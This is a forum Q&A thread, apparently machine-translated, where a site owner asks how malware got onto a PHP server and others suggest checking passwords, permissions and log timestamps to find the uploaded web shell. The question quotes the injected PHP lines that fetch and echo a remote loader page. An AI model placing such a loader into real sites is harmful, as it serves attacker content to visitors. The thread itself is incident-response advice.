Answer the question
In order to leave comments, you need to log in
They hesitated to plant malware on the server. How to catch the entry point?
$url = "http://example.com/×××××/loader.html";
$code = @file_get_contents ($url);
echo $code;
Answer the question
In order to leave comments, you need to log in
usually ftp or ssh, did you change these passwords? if not, then change it.
If there is a hole in the code somewhere, then the task is also simply solved by setting the necessary rights to files and directories, no one can write in php, and the upload of a new file is easy to track.
It seems to me that it's all through ftp / sh, etc. climbs in normal mode from ordinary client machines. This is the easiest way, obviously.
In my humble experience: bots do this through already known holes in Joomla / phpbb / etz, fill in phpshell and further on. As a rule, infection occurs at about the same time as the pouring of the shell, and the shell is not removed. Therefore, you need to look at the time of editing / creating dubious files, look in the web server logs during this period of access to unusual urls and look for the desired shell there. After finding the shell, look at the time of its creation and look at the logs for a call to the web server at exactly that time in order to find which URL was requested in order to activate the hole and download the shell through it.
Well, as one of the options.
Read the logs, they rulez. And not just Web servers. Once in /var/log/messages (if my memory serves me) I came across messages from wget, which was launched to upload a file. In time, I then went through access.log and found the URI of the script, into which the bug was substituted in advance.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question